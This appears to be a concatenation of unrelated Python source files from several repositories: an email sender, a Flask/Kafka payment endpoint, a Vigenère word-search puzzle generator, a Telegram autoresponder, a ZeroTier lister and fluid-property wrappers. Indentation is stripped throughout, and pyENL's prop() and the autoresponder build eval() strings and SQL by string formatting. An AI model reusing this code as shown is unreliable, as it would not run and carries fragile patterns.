print("msg : ", str(msg.as_bytes()))
sendmail_location = "/usr/sbin/sendmail"
subprocess.run([sendmail_location, "-t", "-oi"], input=msg.as_bytes())
def send_error_email(application):
# email.cfg is a two line text file
with open("email.cfg") as f:
from_email_addr = r'{}'.format(f.readline())
to_email_addr = r'{}'.format(f.readline())
from_email_addr = from_email_addr.rstrip('\n')
to_email_addr = to_email_addr.rstrip('\n')
print("sending email")
print("from: ", from_email_addr)
print("to: ", to_email_addr)
msg = "error has occurred in appliation: " + application
subject = msg
send_email(from_email_addr, to_email_addr, subject, msg)
print("finished...")
``` |
{
"source": "jon32446/azure-k8s-helm-kafka-experiment",
"score": 3
} |
#### File: containers/uwsgi-server/server.py
```python
from flask import Flask, request
from flask_json import FlaskJSON, as_json
from kafka import KafkaProducer
from json import loads, dumps
import datetime
# Create the Flask WSGI application
app = Flask(__name__)
# Add Flask-JSON extension to the app
FlaskJSON(app)
@app.route('/')
def get_root():
return "Try /time or /payment\n"
@app.route('/time')
@as_json
def get_time():
return {"now": datetime.datetime.now()}
@app.route('/payment', methods=['GET', 'POST'])
@as_json
def post_pay():
if request.method == 'GET':
return {"usage": "POST from_account, to_account, amount"}
elif request.method == 'POST':
# Get all the fields needed
message = {key: request.form[key] for key in [
"from_account", "to_account", "amount"
]}
message["timestamp"] = datetime.datetime.utcnow().isoformat()
# Publish payment message to Kafka
producer = KafkaProducer(
bootstrap_servers=['kafka.kafka.svc.cluster.local:9092'],
value_serializer=lambda x: dumps(x).encode('utf-8'))
producer.send('payment', value=message)
# Return
return {"status": "payment successful"}
if __name__ == '__main__':
app.run()
``` |
{
"source": "jon32446/python-puzzles",
"score": 3
} |
#### File: python-puzzles/word-search-WIP/text_on_image.py
```python
import itertools
import random
import string
from functools import reduce
import PIL
from PIL import Image, ImageDraw, ImageFont
# block of letters
#
# numbers at top, each one is an index into the block, row-wise. these are general clues for the
# rest of the puzzle
#
# lastly, each letter is a colour. the colour will be 255 in all channels except 1, which will
# contain a byte value. these bytes are the final part of the puzzle.
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
WIDTH = 800
HEIGHT = 600
SPACING = 24
STARTX = (WIDTH - SPACING * 16) / 2
STARTY = (HEIGHT - SPACING * 16) / 2
# these appear at the top as numbers, and are indexes into the main block, row-wise
top_message = [
"word search",
"Vigenere",
"rgbtobin"
]
def encode_vigenere(message, key="mosaic"):
message = [ord(m) - ord("A") for m in message.upper() if m in string.ascii_uppercase]
key = [ord(k) - ord("A") for k in key.upper() if k in string.ascii_uppercase]
print(key, message)
c = []
for m, k in zip(message, itertools.cycle(key)):
c.append((m + k) % 26) # c = m + k mod 26
print("".join(chr(ord("A") + i) for i in c))
return "".join(chr(ord("A") + i) for i in c)
def decode_vigenere(cyphertext, key="mosaic"):
cyphertext = [ord(m) - ord("A") for m in cyphertext.upper() if m in string.ascii_uppercase]
key = [ord(k) - ord("A") for k in key.upper() if k in string.ascii_uppercase]
print(key, cyphertext)
m = []
for c, k in zip(cyphertext, itertools.cycle(key)):
m.append((c - k) % 26) # m = c - k mod 26
print("".join(chr(ord("A") + i) for i in m))
return "".join(chr(ord("A") + i) for i in m)
# the block message must not exceed 256 chars - it will be truncated
block_message = "Paul sensed his own tensions decided to practice one of the mindbody lessons " \
"his mother had taught him three quick breaths triggered the responses he fell into the " \
"floating awareness focusing the consciousness aortal dilation avoiding the unfocused " \
"mechanism of consciousness to be conscious by choice"
chars = "".join(i for i in block_message.upper() if i in string.ascii_uppercase)
if len(chars) < 256:
chars += "".join(random.choice(string.ascii_uppercase) for i in range(256 - len(chars)))
hint = "MOSAICVIGENERECYPHER"
chars = encode_vigenere(chars)
# place a hint at the start to indicate that there are words in the block (word search)
chars = "HELLO" + chars
# place the decryption hint in plaintext in the middle of the chars after encoding it
midpoint = (16//2) * 16 # place it on the middle line
chars = chars[:midpoint] + "MOSAICVIGENEREXX" + chars[midpoint:]
# another word search hint at the end, and truncate to 256
chars = chars[:256 - len("GOODBYE")] + "GOODBYE"
for i, c in zip(range(len(chars)), chars):
if i % 16 == 0:
print("")
print("{:>3} {}".format(i, c), end=" ## ")
print("")
# create a lookup table for all the letters, with the positions in the block where the letter can be found
lookup = {}
for c in string.ascii_uppercase:
lookup[c] = [i for i in range(len(chars)) if chars[i] == c]
def encode_lookup(message):
return " ".join(str(random.choice(lookup[c]) + 1 if c in lookup.keys() else "") for c in message)
def encode_min(message):
return " ".join(str(min(lookup[c]) + 1 if c in lookup.keys() else "") for c in message)
top_message = [i.upper() for i in top_message]
top_message_encoded = [encode_lookup(i) for i in top_message]
print(top_message)
print(top_message_encoded)
font = ImageFont.truetype(r"C:\Windows\Fonts\consola.ttf", 25)
img = Image.new("RGBA", (WIDTH, HEIGHT), BLACK)
draw = ImageDraw.Draw(img)
draw.fontmode = "1" # this sets font anti-aliasing off.
for i, encoded_message in enumerate(top_message_encoded):
encoded_width = font.getsize(encoded_message)[0]
draw.text(((WIDTH - encoded_width) / 2, 16 + SPACING * i), encoded_message, WHITE, font=font)
def encode_as_colour(char):
char_value = ord(char)
c = [255, 255, 255]
c[random.randint(0, 2)] = char_value
return tuple(c)
for row in range(16):
for col in range(16):
i = row * 16 + col
draw.text(
(STARTX + col * SPACING, STARTY + row * SPACING),
chars[i],
encode_as_colour(random.choice(string.ascii_uppercase + string.ascii_lowercase)),
font=font
)
draw = ImageDraw.Draw(img)
img.save("text_on_image.png")
``` |
{
"source": "jon4hz/tg-autoresponder",
"score": 2
} |
#### File: jon4hz/tg-autoresponder/autoresponder.py
```python
try:
import asyncio, json, os, sys, aiosqlite
from datetime import datetime
from telethon import TelegramClient, events
from data.message import text as MESSAGE
from data.config import config as config_file
except ImportError as e:
print(f'Error could not import modules - {e}')
# check required vars
if not os.environ.get('TELEGRAM_API_ID') or not os.environ.get('TELEGRAM_API_HASH') or not os.environ.get('TELEGRAM_PHONE'):
print("Error: Please set all environment variables!")
sys.exit(1)
# Write config from environment variables
try:
config = {
'telegram': {
'api_id': os.environ.get('TELEGRAM_API_ID'),
'api_hash': os.environ.get('TELEGRAM_API_HASH'),
'phone': os.environ.get('TELEGRAM_PHONE')
},
'database': {
'file': os.environ.get('DATABASE_FILE','data/database.db')
},
'autoresponder': {
'timeout': os.environ.get('AUTORESPONDER_TIMEOUT','60') # in minutes
}
}
except Exception as e:
print(f'{datetime.utcnow()} - Error: {e}')
sys.exit(1)
# Reading configs
try:
# telegram client credentials
API_ID = config['telegram']['api_id']
API_HASH = config['telegram']['api_hash']
PHONE = config['telegram']['phone']
# DB
DB_FILE = config['database']['file']
# Autoresponder
EXCLUDED_USERS = config_file['autoresponder']['excluded_users']
TIMEOUT = config['autoresponder']['timeout']
except Exception as e:
print(f'{datetime.utcnow()} - Error: Could not read variables from config \n - Missing Key: {e}')
sys.exit(1)
# create client
try:
client = TelegramClient(f'data/{PHONE}', API_ID, API_HASH)
client.session.save()
except Exception as e:
print(f'{datetime.utcnow()} - Error: Could not create client. - {e}')
sys.exit(1)
async def setup_inital_database(database) -> None:
try:
async with aiosqlite.connect(database) as db:
await db.execute('DROP TABLE IF EXISTS data;')
await db.execute('''
CREATE TABLE data(id INTEGER PRIMARY KEY, last_contacted INTEGER);
''')
await db.commit()
except Exception as e:
print(f'{datetime.utcnow()} - Error: could not create database. Aborting now! - {e}')
sys.exit(1)
async def get_data_from_database(database, tg_id) -> int:
try:
async with aiosqlite.connect(DB_FILE) as db:
async with db.execute(f'''
SELECT * FROM data where id={tg_id};
''') as cur:
async for row in cur:
return row[1]
except Exception as e:
print(f'{datetime.utcnow()} - Error: {e}')
if "no such table" in str(e):
await setup_inital_database(DB_FILE)
# listener
@client.on(events.NewMessage())
async def handler(event) -> None:
if (event.is_private and
not (await event.get_sender()).bot and
not event.message.out and
event.sender_id not in EXCLUDED_USERS):
# check if user in database
last_contacted = await get_data_from_database(DB_FILE, event.sender_id)
if last_contacted:
if ((datetime.utcnow().timestamp()-last_contacted) /60) > int(TIMEOUT):
# trigger autoresponder
await client.send_message(event.sender_id, reply_to=event.message.id, message=MESSAGE, link_preview=False)
# update last_contacted time
try:
async with aiosqlite.connect(DB_FILE) as db:
await db.execute(f'''
UPDATE data
SET last_contacted={datetime.utcnow().timestamp()}
WHERE id={event.sender_id};
''')
await db.commit()
except Exception as e:
print(f'{datetime.utcnow()} - Error: {e}')
if "no such table" in str(e):
await setup_inital_database(DB_FILE)
else:
# insert user to database
try:
async with aiosqlite.connect(DB_FILE) as db:
await db.execute(f'''
INSERT INTO data(id, last_contacted) VALUES
({event.sender_id},{datetime.utcnow().timestamp()})
''')
await db.commit()
except Exception as e:
print(f'{datetime.utcnow()} - Error: {e}')
if "no such table" in str(e):
await setup_inital_database(DB_FILE)
# trigger autoresponder
await client.send_message(event.sender_id, reply_to=event.message.id, message=MESSAGE, link_preview=False)
if __name__ == "__main__":
# check if database file exists
if not os.path.isfile(DB_FILE):
asyncio.run(setup_inital_database(DB_FILE))
# start the client
try:
client.start()
except EOFError:
print(f'\n{datetime.utcnow()} - Error: Please generate the session file first. Execute "sudo docker-compose run autoresponder", fill the informations and start the container again!.')
sys.exit(1)
except Exception as e:
print(f'{datetime.utcnow()} - Error: Could not create client. - {e}')
sys.exit(1)
print("Client started...")
client.run_until_disconnected()
print("Client closed...")
``` |
{
"source": "jon77p/ztls",
"score": 2
} |
#### File: jon77p/ztls/ztls.py
```python
import requests
from os import getenv, uname
from sys import argv
def ztls(preferred=None, only_online=False):
API = getenv('ZT_API')
if not API:
print('Error!')
print("'ZT_API' environment variable does not exist!")
exit()
base = 'https://my.zerotier.com/api/'
header = {'Authorization': 'bearer ' + API}
req = requests.get(base + 'network', headers=header).json()
networks = {}
for i in req:
networks[i['config']['name']] = i['id']
results = {}
print()
for network in networks:
if preferred is None or preferred.lower() in network.lower():
results[network] = {}
print(network + ":")
print()
res = requests.get(base + 'network/' + networks[network] + '/member', headers=header).json()
for member in res:
if member['config']['authorized']:
results[network][member['name']] = {}
results[network][member['name']]['name'] = member['name']
results[network][member['name']]['ip'] = member['config']['ipAssignments'][0]
if member['online']:
if uname().sysname == 'Darwin':
results[network][member['name']]['status'] = '\x1b[1;32;40m' + '' + '\x1b[0m'
else:
results[network][member['name']]['status'] = '🌐'
else:
if only_online is False:
if uname().sysname == 'Darwin':
results[network][member['name']]['status'] = '\x1b[1;31;40m' + '' + '\x1b[0m'
else:
results[network][member['name']]['status'] = '⛔️'
else:
continue
print("{0: <20} | {1:<15} | Status: {2}".format(results[network][member['name']]['name'], results[network][member['name']]['ip'], results[network][member['name']]['status']))
print()
if __name__ == "__main__":
if '-online'.lower() in argv:
only_online = True
argv.pop() # remove online cmd arg from argv size
else:
only_online = False
if len(argv) == 2:
ztls(argv[1], only_online=only_online)
else:
ztls(only_online=only_online)
``` |
{
"source": "jon85p/pyENL",
"score": 3
} |
#### File: pyENL/pyENL_fcns/functions.py
```python
from fluids import atmosphere as atm
from fluids import compressible as comp
from fluids import control_valve as cv
from CoolProp.CoolProp import PropsSI as proppyENL
from CoolProp.CoolProp import HAPropsSI as haproppyENP
from pint import _DEFAULT_REGISTRY as pyENLu
try:
pyENLu.load_definitions("units.txt")
except:
pass
parse = pyENLu.parse_units
unit_pyENL = pyENLu.m
# TODO
# Funciones de CoolProp pasarlas por un wrapper de unidades!
# Diccionario Coolprop
dicc_coolprop = {'DMOLAR':parse('mole/m^3'), 'Dmolar':parse('mole/m^3'),
'D':parse('kg/m^3'), 'DMASS':parse('kg/m^3'), 'Dmass':'kg/m^3',
'HMOLAR':parse('J/mol'), 'Hmolar':parse('J/mol'),
'H':parse('J/kg'), 'HMASS':parse('J/kg'), 'Hmass':parse('J/kg'),
'P':parse('Pa'), 'Q':parse('mol/mol'),
'SMOLAR':parse('J/mol/K'), 'Smolar':parse('J/mol/K'),
'S':parse('J/kg/K'), 'SMASS': parse('J/kg/K'), 'Smass': parse('J/kg/K'),
'T': parse('K'), 'UMOLAR': parse('J/mol'), 'Umolar': parse('J/mol'),
'A': parse('m/s'), 'SPEED_OF_SOUND': parse('m/s'), 'speed_of_sound': parse('m/s'),
'CONDUCTIVITY':parse('W/m/K'), 'L':parse('W/m/K'), 'conductivity':parse('W/m/K'),
'CP0MASS': parse('J/kg/K'), 'Cp0mass': parse('J/kg/K'),
'CP0MOLAR': parse('J/mol/K'), 'Cp0molar': parse('J/mol/K'),
'CPMOLAR': parse('J/mol/K'), 'Cpmolar': parse('J/mol/K'),
'CVMASS': parse('J/kg/K'), 'Cvmass': parse('J/kg/K'), 'O': parse('J/kg/K'),
'CVMOLAR': parse('J/mol/K'), 'Cvmolar': parse('J/mol/K'),
'C':parse('J/kg/K'), 'CPMASS':parse('J/kg/K'), 'Cpmass':parse('J/kg/K'),
'DIPOLE_MOMENT':parse('C*m'), 'dipole_moment':parse('C*m'),
'GAS_CONSTANT': parse('J/mol/K'), 'gas_constant':parse('J/mol/K'),
'GMOLAR': parse('J/mol'), 'Gmolar': parse('J/mol'),
'G': parse('J/kg'), 'GMASS': parse('J/kg'), 'Gmass': parse('J/kg'),
'HELMHOLTZMASS': parse('J/kg'), 'Helmholtzmass': parse('J/kg'),
'HELMHOLTZMOLAR': parse('J/mol'), 'Helmholtzmolar': parse('J/mol'),
'ISOBARIC_EXPANSION_COEFFICIENT': parse('1/K'), 'isobaric_expansion_coefficient': parse('1/K'),
'ISOTHERMAL_COMPRESSIBILITY': parse('1/Pa'), 'isothermal_compressibility': parse('1/Pa'),
'I': parse('N/m'), 'SURFACE_TENSION': parse('N/m'), 'surface_tension': parse('N/m'),
'M': parse('kg/mol'), 'MOLARMASS': parse('kg/mol'), 'MOLAR_MASS': parse('kg/mol'),
'MOLEMASS': parse('kg/mol'), 'molar_mass': parse('kg/mol'),
'molarmass': parse('kg/mol'), 'molemass': parse('kg/mol'),
'PCRIT': parse('Pa'), 'P_CRITICAL': parse('Pa'), 'Pcrit': parse('Pa'),
'p_critical': parse('Pa'), 'pcrit': parse('Pa'), 'PMAX': parse('Pa'),
'P_MAX': parse('Pa'), 'P_max': parse('Pa'), 'pmax': parse('Pa'),
'PMIN': parse('Pa'), 'P_MIN': parse('Pa'), 'P_min': parse('Pa'), 'pmin': parse('Pa'),
'PTRIPLE': parse('Pa'), 'P_TRIPLE': parse('Pa'), 'p_triple': parse('Pa'),
'ptriple': parse('Pa'), 'P_REDUCING': parse('Pa'), 'p_reducing': parse('Pa'),
'RHOCRIT': parse('kg/m^3'), 'RHOMASS_CRITICAL': parse('kg/m^3'),
'rhocrit': parse('kg/m^3'), 'rhomass_critical': parse('kg/m^3'),
'RHOMASS_REDUCING': parse('kg/m^3'), 'rhomass_reducing': parse('kg/m^3'),
'RHOMOLAR_CRITICAL':parse('mol/m^3'), 'rhomolar_critical':parse('mol/m^3'),
'RHOMOLAR_REDUCING':parse('mol/m^3'), 'rhomolar_reducing':parse('mol/m^3'),
'SMOLAR_RESIDUAL': parse('J/mol/K'), 'Smolar_residual': parse('J/mol/K'),
'TCRIT': pyENLu.K, 'T_CRITICAL': pyENLu.K, 'T_critical': pyENLu.K, 'Tcrit': pyENLu.K,
'TMAX': pyENLu.K, 'T_MAX': pyENLu.K, 'T_max': pyENLu.K, 'Tmax': pyENLu.K,
'TMIN': pyENLu.K, 'T_MIN': pyENLu.K, 'T_min': pyENLu.K, 'Tmin': pyENLu.K,
'TTRIPLE': pyENLu.K, 'T_TRIPLE': pyENLu.K, 'T_triple': pyENLu.K, 'Ttriple': pyENLu.K,
'T_FREEZE': pyENLu.K, 'T_freeze': pyENLu.K, 'T_REDUCING': pyENLu.K, 'T_reducing': pyENLu.K,
'V': parse('Pa*s'), 'VISCOSITY': parse('Pa*s'), 'viscosity': parse('Pa*s')}
# TODO: Agregar las adimensionales!
def prop(des, *args):
# des es lo que se quiere
# Convertir a unidades base, esto verificará también que pueda hacerse
# TODO Problema con el registro, ¿cómo abordarlo desde CoolProp?
# print(args)
query = 'dicc_coolprop["' + des+ '"] * proppyENL("' + des + '",'
for i, arg in enumerate(args):
# Si es texto, dejarlo igual
if 'str' not in str(arg.__class__):
# Hacer lo de las unidades, convertir a la del término anterior de texto
try:
nuevoarg = arg.to(dicc_coolprop[args[i-1]])
except:
# Si no tiene unidades, asignar auto dimensionless
# raise Exception("Argumento de prop() debe tener unidades")
nuevoarg = arg * pyENLu.m/pyENLu.m
query = query + str(nuevoarg.magnitude) + ','
elif i == len(args) - 1:
query += '"' + arg + '")'
else:
query += '"' + arg + '",'
# print(query)
out = eval(query)
#out._REGISTRY = _REGISTRY
return out
def quadsum(x, y):
return x**2 + y ** 2
def corriente(str1, a, str2, b):
'''
Ejemplo para funciones de usuario usando función sencilla para hallar
la corriente dado un voltaje V y una resistencia R.
La llamada es similar a como se llaman las funciones de propiedades
Ejemplo en test/test4.txt
'''
V = ['V', 'v', 'voltaje', 'Voltaje']
R = ['R', 'r', 'resistencia', 'Resistencia']
try:
if str1 in V and str2 in R:
v, r = a, b
if str1 in R and str2 in V:
r, v = a, b
return v / r
except Exception as e:
if 'by zero' in str(e):
raise Exception
else:
# Esto es: A menos que el error sea por división por cero, lanzar
# una excepción especial que será tomada por el algoritmo de
# excepciones.
raise ValueError(
'No se tienen los valores requeridos por la función')
def fluids_atmosphere_1976(str1, Z, dt=0):
'''
US Standard Atmosphere 1976 class, which calculates T, P, rho, v_sonic,
mu, k, and g as a function of altitude above sea level.
'''
Za = Z.to("m")
Za = Za.magnitude
obj = atm.ATMOSPHERE_1976(Za, dt)
salida = ['T', 'P', 'rho', 'v_sonic', 'mu', 'k', 'g']
out = [obj.T*pyENLu.K, obj.P*pyENLu.Pa, obj.rho*pyENLu.kg/(pyENLu.m)**3,\
obj.v_sonic*pyENLu.m/pyENLu.s, obj.mu*pyENLu.Pa*pyENLu.s, obj.k*pyENLu.W/(pyENLu.m*pyENLu.K),\
obj.g*pyENLu.m/(pyENLu.s)**2]
if str1 in salida:
salida_fun = out[salida.index(str1)]
# Ajustando el registro de unidades para concordancia
salida_fun._REGISTRY = Z._REGISTRY
return salida_fun
else:
raise Exception('Propiedad no listada')
def fluids_atmosphere_nrlmsise00(str1, Z, latitude=0, longitude=0, day=0, seconds=0,
f107=150.0, f107_avg=150.0,
geomagnetic_disturbance_indices=None):
'''
NRLMSISE 00 model for calculating temperature and density of gases in the
atmosphere, from groud level to 1000 km, as a function of time of year,
longitude and latitude, solar activity and earth’s geomagnetic disturbance.
NRLMSISE standa for the US Naval Research Laboratory Mass Spectrometer
and Incoherent Scatter Radar Exosphere model, released in 2001
pyENL plus: Density of gases in mol/m^3
'''
NA = 6.022140857 * 1e23 # Avogadro number
Za = Z.to("m")
Za = Za.magnitude
mol3 = pyENLu.mol/((pyENLu.m)**3)
obj = atm.ATMOSPHERE_NRLMSISE00(Za, latitude, longitude, day, seconds,
f107, f107_avg,
geomagnetic_disturbance_indices)
salida = ["rho", "T", "P", "He_density", "O_density", "N2_density", "O2_density",
"Ar_density", "H_density", "N_density", "O_anomalous_density"]
out = [obj.rho*pyENLu.kg/(pyENLu.m)**3, obj.T*pyENLu.K, obj.P*pyENLu.Pa, (obj.He_density / NA)*mol3,\
(obj.O_density / NA)*mol3, (obj.N2_density / NA)*mol3, (obj.O2_density / NA)*mol3,\
(obj.Ar_density / NA)*mol3, (obj.H_density / NA)*mol3,\
(obj.N_density / NA)*mol3, (obj.O_anomalous_density / NA)*mol3]
if str1 in salida:
salida_fun = out[salida.index(str1)]
salida_fun._REGISTRY = Z._REGISTRY
return salida_fun
else:
raise Exception('invalid syntax')
# PROBLEM: hwm93 y hwm14 funcionan con f2py, que no está portada a Python3
# def fluids_hwm93(str1, Z, latitude=0, longitude=0, day=0, seconds=0,
# f107=150.0, f107_avg=150.0, geomagnetic_disturbance_index=4):
# '''
# Horizontal Wind Model 1993, for calculating wind velocity in the
# atmosphere as a function of time of year, longitude and latitude,
# solar activity and earth’s geomagnetic disturbance.
# '''
#
# obj = atm.hwm93(Z, latitude, longitude, day, seconds,
# f107, f107_avg, geomagnetic_disturbance_index)
#
# salida =
def fluids_Panhandle_A(SG, Tavg, L=None, D=None, P1=None, P2=None,
Q=None, Ts=288.7, Ps=101325.0, Zavg=1, E=0.92):
'''
Calculation function for dealing with flow of a compressible gas in a
pipeline with the Panhandle B formula. Can calculate any of the following,
given all other inputs
Parameters:
SG : float
Specific gravity of fluid with respect to air at the reference temperature and pressure Ts and Ps, [-]
Tavg : float
Average temperature of the fluid in the pipeline, [K]
L : float, optional
Length of pipe, [m]
D : float, optional
Diameter of pipe, [m]
P1 : float, optional
Inlet pressure to pipe, [Pa]
P2 : float, optional
Outlet pressure from pipe, [Pa]
Q : float, optional
Flow rate of gas through pipe, [m^3/s]
Ts : float, optional
Reference temperature for the specific gravity of the gas, [K]
Ps : float, optional
Reference pressure for the specific gravity of the gas, [Pa]
Zavg : float, optional
Average compressibility factor for gas, [-]
E : float, optional
Pipeline efficiency, a correction factor between 0 and 1
Returns:
Q, P1, P2, D, or L : float
The missing input which was solved for [base SI]
'''
# Aa
check = [L, D, P1, P2, Q]
unidades = ["m", "m", "Pa", "Pa", "m**3/s"]
unknowns = check.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
Tavg = Tavg.to("K")
registro = Tavg._REGISTRY
Tavg = Tavg.magnitude
try:
L = L.to("m")
L = L.magnitude
except:
pass
try:
D = D.to("m")
D = D.magnitude
except:
pass
try:
P1 = P1.to("Pa")
P1 = P1.magnitude
except:
pass
try:
P2 = P2.to("Pa")
P2 = P2.magnitude
except:
pass
try:
Q = Q.to("m**3/s")
Q = Q.magnitude
except:
pass
output = comp.Panhandle_A(SG, Tavg, L, D, P1, P2, Q, Ts, Ps, Zavg, E)
if output.imag != 0:
# Hay parte imaginaria en la respuesta, lanzar excepción
raise Exception
# Reconocer cuál fue la salida
unidad = unidades[check.index(None)]
output = output*pyENLu.parse_units(unidad)
output._REGISTRY = registro
return output
def fluids_Panhandle_B(SG, Tavg, L=None, D=None, P1=None, P2=None,
Q=None, Ts=288.7, Ps=101325.0, Zavg=1, E=0.92):
# Aa
'''
Calculation function for dealing with flow of a compressible gas in a
pipeline with the Panhandle B formula. Can calculate any of the following,
given all other inputs
'''
check = [L, D, P1, P2, Q]
unknowns = check.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.Panhandle_B(SG, Tavg, L, D, P1, P2, Q, Ts, Ps, Zavg, E)
if output.imag != 0:
# Hay parte imaginaria en la respuesta, lanzar excepción
raise Exception
return output
def fluids_Weymouth(SG, Tavg, L=None, D=None, P1=None, P2=None,
Q=None, Ts=288.7, Ps=101325.0, Zavg=1, E=0.92):
'''
Calculation function for dealing with flow of a compressible gas in a
pipeline with the Weymouth formula. Can calculate any of the following,
given all other inputs.
'''
# Aa
check = [L, D, P1, P2, Q]
unknowns = check.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.Weymouth(SG, Tavg, L, D, P1, P2, Q, Ts, Ps, Zavg, E)
if output.imag != 0:
# Hay parte imaginaria en la respuesta, lanzar excepción
raise Exception
return output
def fluids_Spitzglass_high(SG, Tavg, L=None, D=None, P1=None, P2=None, Q=None,
Ts=288.7, Ps=101325.0, Zavg=1, E=1.0):
'''
Calculation function for dealing with flow of a compressible gas in a
pipeline with the Splitzglass (high pressure drop) formula. Can calculate
any of the following, given all other inputs.
'''
# Aa
check = [L, D, P1, P2, Q]
unknowns = check.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.Spitzglass_high(SG, Tavg, L, D, P1, P2, Q, Ts, Ps, Zavg, E)
if output.imag != 0:
# Hay parte imaginaria en la respuesta, lanzar excepción
raise Exception
return output
def fluids_Spitzglass_low(SG, Tavg, L=None, D=None, P1=None, P2=None, Q=None,
Ts=288.7, Ps=101325.0, Zavg=1, E=1.0):
'''
Calculation function for dealing with flow of a compressible gas in a
pipeline with the Splitzglass (low pressure drop) formula. Can calculate
any of the following, given all other inputs.
'''
# Aa
check = [L, D, P1, P2, Q]
unknowns = check.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.Spitzglass_low(SG, Tavg, L, D, P1, P2, Q, Ts, Ps, Zavg, E)
if output.imag != 0:
# Hay parte imaginaria en la respuesta, lanzar excepción
raise Exception
return output
def fluids_Fritzsche(SG, Tavg, L=None, D=None, P1=None, P2=None, Q=None,
Ts=288.7, Ps=101325.0, Zavg=1, E=1):
'''
Calculation function for dealing with flow of a compressible gas in a
pipeline with the Fritzsche formula.
'''
# Aa
check = [L, D, P1, P2, Q]
unknowns = check.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.Fritzsche(SG, Tavg, L, D, P1, P2, Q, Ts, Ps, Zavg, E)
if output.imag != 0:
# Hay parte imaginaria en la respuesta, lanzar excepción
raise Exception
return output
def fluids_Oliphant(SG, Tavg, L=None, D=None, P1=None, P2=None, Q=None,
Ts=288.7, Ps=101325.0, Zavg=1, E=0.92):
'''
Calculation function for dealing with flow of a compressible gas in a
pipeline with the Oliphant formula.
'''
check = [L, D, P1, P2, Q]
unknowns = check.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.Oliphant(SG, Tavg, L, D, P1, P2, Q, Ts, Ps, Zavg, E)
if output.imag != 0:
# Hay parte imaginaria en la respuesta, lanzar excepción
raise Exception
return output
def fluids_Muller(SG, Tavg, mu, L=None, D=None, P1=None, P2=None, Q=None,
Ts=288.7, Ps=101325.0, Zavg=1, E=1):
'''
Calculation function for dealing with flow of a compressible gas in a
pipeline with the Muller formula.
'''
check = [L, D, P1, P2, Q]
unknowns = check.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.Muller(SG, Tavg, mu, L, D, P1, P2, Q, Ts, Ps, Zavg, E)
if output.imag != 0:
# Hay parte imaginaria en la respuesta, lanzar excepción
raise Exception
return output
def fluids_IGT(SG, Tavg, mu, L=None, D=None, P1=None, P2=None, Q=None,
Ts=288.7, Ps=101325.0, Zavg=1, E=1):
'''
Calculation function for dealing with flow of a compressible gas in a
pipeline with the IGT formula.
'''
check = [L, D, P1, P2, Q]
unknowns = check.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.IGT(SG, Tavg, mu, L, D, P1, P2, Q, Ts, Ps, Zavg, E)
if output.imag != 0:
# Hay parte imaginaria en la respuesta, lanzar excepción
raise Exception
return output
def fluids_isothermal_gas(rho, f, P1=None, P2=None, L=None, D=None, m=None):
'''
Calculation function for dealing with flow of a compressible gas in a
pipeline for the complete isothermal flow equation.
m mass flow
'''
check = [L, D, P1, P2, m]
unknowns = check.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.isothermal_gas(rho, f, P1, P2, L, D, m)
if output.imag != 0:
# Hay parte imaginaria en la respuesta, lanzar excepción
raise Exception
return output
def fluids_isothermal_work_compression(P1, P2, T, Z=1):
'''
Calculates the work of compression or expansion of a gas going through
an isothermal process.
'''
return comp.isothermal_work_compression(P1, P2, T, Z)
def fluids_polytropic_exponent(k, n=None, eta_p=None):
'''
Calculates either the polytropic exponent from polytropic efficiency
or polytropic efficiency from the polytropic exponent.
Returns isentropic exponent or polytropic efficiency, depending on input.
'''
inp = [n, eta_p]
unknowns = inp.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.polytropic_exponent(k, n, eta_p)
return output
def fluids_isentropic_work_compression(T1, k, Z=1, P1=None, P2=None, W=None,
eta=None):
'''
Calculation function for dealing with compressing or expanding a gas going
through an isentropic, adiabatic process assuming constant Cp and Cv.
The polytropic model is the same equation; just provide n instead of k and
use a polytropic efficienty for eta instead of a isentropic efficiency.
Can calculate any of the following, given all the other inputs:
W, Work of compression
P2, Pressure after compression
P1, Pressure before compression
eta, isentropic efficiency of compression
'''
inp = [P1, P2, W, eta]
unknowns = inp.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.isentropic_work_compression(T1, k, Z, P1, P2, W, eta)
return output
def fluids_isentropic_efficiency(P1, P2, k, eta_s=None, eta_p=None):
'''
Calculates either isentropic or polytropic efficiency from the other
type of efficiency. (isentropic or polytropic)
'''
inp = [eta_s, eta_p]
unknowns = inp.count(None)
if unknowns != 1:
raise Exception('invalid syntax')
output = comp.isentropic_efficiency(P1, P2, k, eta_s, eta_p)
return output
def fluids_isentropic_T_rise_compression(T1, P1, P2, k, eta=1):
'''
Calculates the increase in temperature of a fluid which is compressed or
expanded under isentropic, adiabatic conditions assuming constant Cp and Cv.
The polytropic model is the same equation; just provide n instead of k and
use a polytropic efficienty for eta instead of a isentropic efficiency.
'''
return comp.isentropic_T_rise_compression(T1, P1, P2, k, eta)
def fluids_T_critical_flow(T, k):
'''
Calculates critical flow temperature Tcf for a fluid with the given
isentropic coefficient. Tcf is in a flow (with Ma=1) whose stagnation
conditions are known. Normally used with converging/diverging nozzles.
Parameters:
T : float
Stagnation temperature of a fluid with Ma=1 [K]
k : float
Isentropic coefficient []
Returns:
Tcf : float
Critical flow temperature at Ma=1 [K]
'''
return comp.T_critical_flow(T, k)
def fluids_P_critical_flow(P, k):
'''
Calculates critical flow pressure Pcf for a fluid with the given isentropic coefficient. Pcf is in a flow (with Ma=1) whose stagnation conditions are known. Normally used with converging/diverging nozzles.
Parameters:
P : float
Stagnation pressure of a fluid with Ma=1 [Pa]
k : float
Isentropic coefficient []
Returns:
Pcf : float
Critical flow pressure at Ma=1 [Pa]
'''
return comp.P_critical_flow(P, k)
def fluids_P_isothermal_critical_flow(P, fd, D, L):
'''
Calculates critical flow pressure Pcf for a fluid flowing isothermally and
suffering pressure drop caused by a pipe’s friction factor.
Parameters:
P : float
Inlet pressure [Pa]
fd : float
Darcy friction factor for flow in pipe [-]
L : float, optional
Length of pipe, [m]
D : float, optional
